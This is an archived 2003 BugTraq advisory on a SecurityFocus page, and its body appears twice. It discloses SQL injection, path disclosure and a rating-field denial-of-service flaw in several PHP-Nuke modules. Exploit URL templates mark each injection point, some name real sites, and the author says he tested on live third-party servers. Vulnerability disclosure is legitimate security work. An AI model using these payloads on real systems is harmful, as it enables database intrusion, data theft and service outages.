BugTraq
Back to list
|
Post reply
PHP-Nuke Denial of Service attack and more SQL Injections
May 18 2003 10:01AM
Lorenzo Manuel Hernandez Garcia-Hierro (security lorenzohgh com)
-------
Product: PHP-Nuke
Vendor: Francisco Burzi
Versions Vulnerable:
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
6.5 with all patches ,
6.0 with all patches.
5.5 with all patches
No vulnerable:
?
------
DESCRIPTION:
------
New SQL Injections and Paths Disclosures related to the main modules.
Please , look at the final ` , other sql injections don't use this but
this
very important for make a successful query.
--------
FOUND VULNERABLE MODULES:
--------
--------
- SECTIONS (NEW)
--------
Type: SQL Injection and Path Disclosure
*********
Exploit:
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR
QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR
QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR
QUERY] (NEW)
--------
-AVANTGO
--------
Type: SQL Injection and Path disclosure. (NEW)
*********
Exploit:
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]
--------
-SURVEYS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
-
http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]
&mode=&order=0&thold=0
--------
-DOWNLOADS
--------
Type: SQL Injection and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR
QUERY]
-
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR
QUERY]&orderby=titleD
-------------
NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)
-------------
I found a denial of service possible attack in Downloads module trought
rating system,
Exploit:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FIL
E
TO RATE]&ratinguser=?&ratinghost_name=?
&rating=9999999999999999999999999999999999999999999999999999999999999999
99
99999
When the file is rated the file gets a 238,609,298.89 rating , this can
be used for make a denial of service attack to the mysql server or send a
very long buffer (buffer overflow, stack crashes). The mysql server puts
this because there's and error with the query ( more characters in field
than the allowed number of characters) if you send a buffer more long
than the allowed/accepted the server be unstable and the system pick up.
Exploit to SQL Injection and Denial of Service Attack:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FIL
E
TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]
--------
- REVIEWS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]
--------
- WEB_LINKS
--------
Type: SQL Injection (NEW) and Path disclosure.(NEW)
********
Exploit:
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
-
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`
[YOUR QUERY]&ratetype=num
- Web-Links module is affected by the DoS possible attack that i
discovered and the SQL Injections and buffer overflows:
Exploit:
http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?
&ratinghost_name=?&rating=[DATA]
[DATA] = your random data to send ( rating points and the field buffer ,
of course ).
--------
SOLUTION:
--------
- Deactivate enterelly the affected modules.
- A temporal workaround for Path Disclosure is configuring in php.ini the
reported error flags ( no report) but this is not very good solution (
WORKAROUND).
-----
WHAT CAN BE HAPPEN? AND NOTES
-----
Gain Access to phpnuke database , content changing , gain access to
private info, server paths reveled. Mysql server buffer overflow,Mysql
server pick up , server pick up.
-NOTES-
I tested it in phpnuke-espanol.org and it is vulnerable to all.
I tested it in phpnuke.org and it is vulnerable on active modules
affected by this ( Downloads, Surveys )( some errors aren't reported
because php.ini is configured for this but the vulnerabilities are
present.).
-----
CONTACT INFO :
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--www.novappc.com --
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
-------
Product: PHP-Nuke
Vendor: Francisco Burzi
Versions Vulnerable:
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
6.5 with all patches ,
6.0 with all patches.
5.5 with all patches
No vulnerable:
?
------
DESCRIPTION:
------
New SQL Injections and Paths Disclosures related to the main modules.
Please , look at the final ` , other sql injections don't use this but
this
very important for make a successful query.
--------
FOUND VULNERABLE MODULES:
--------
--------
- SECTIONS (NEW)
--------
Type: SQL Injection and Path Disclosure
*********
Exploit:
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR
QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR
QUERY] (NEW)
-
http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR
QUERY] (NEW)
--------
-AVANTGO
--------
Type: SQL Injection and Path disclosure. (NEW)
*********
Exploit:
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]
--------
-SURVEYS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
-
http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]
&mode=&order=0&thold=0
--------
-DOWNLOADS
--------
Type: SQL Injection and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR
QUERY]
-
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR
QUERY]&orderby=titleD
-------------
NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)
-------------
I found a denial of service possible attack in Downloads module trought
rating system,
Exploit:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FIL
E
TO RATE]&ratinguser=?&ratinghost_name=?
&rating=9999999999999999999999999999999999999999999999999999999999999999
99
99999
When the file is rated the file gets a 238,609,298.89 rating , this can
be used for make a denial of service attack to the mysql server or send a
very long buffer (buffer overflow, stack crashes). The mysql server puts
this because there's and error with the query ( more characters in field
than the allowed number of characters) if you send a buffer more long
than the allowed/accepted the server be unstable and the system pick up.
Exploit to SQL Injection and Denial of Service Attack:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FIL
E
TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]
--------
- REVIEWS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]
--------
- WEB_LINKS
--------
Type: SQL Injection (NEW) and Path disclosure.(NEW)
********
Exploit:
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
-
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`
[YOUR QUERY]&ratetype=num
- Web-Links module is affected by the DoS possible attack that i
discovered and the SQL Injections and buffer overflows:
Exploit:
http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?
&ratinghost_name=?&rating=[DATA]
[DATA] = your random data to send ( rating points and the field buffer ,
of course ).
--------
SOLUTION:
--------
- Deactivate enterelly the affected modules.
- A temporal workaround for Path Disclosure is configuring in php.ini the
reported error flags ( no report) but this is not very good solution (
WORKAROUND).
-----
WHAT CAN BE HAPPEN? AND NOTES
-----
Gain Access to phpnuke database , content changing , gain access to
private info, server paths reveled. Mysql server buffer overflow,Mysql
server pick up , server pick up.
-NOTES-
I tested it in phpnuke-espanol.org and it is vulnerable to all.
I tested it in phpnuke.org and it is vulnerable on active modules
affected by this ( Downloads, Surveys )( some errors aren't reported
because php.ini is configured for this but the vulnerabilities are
present.).
-----
CONTACT INFO :
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--www.novappc.com --
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
[ reply ]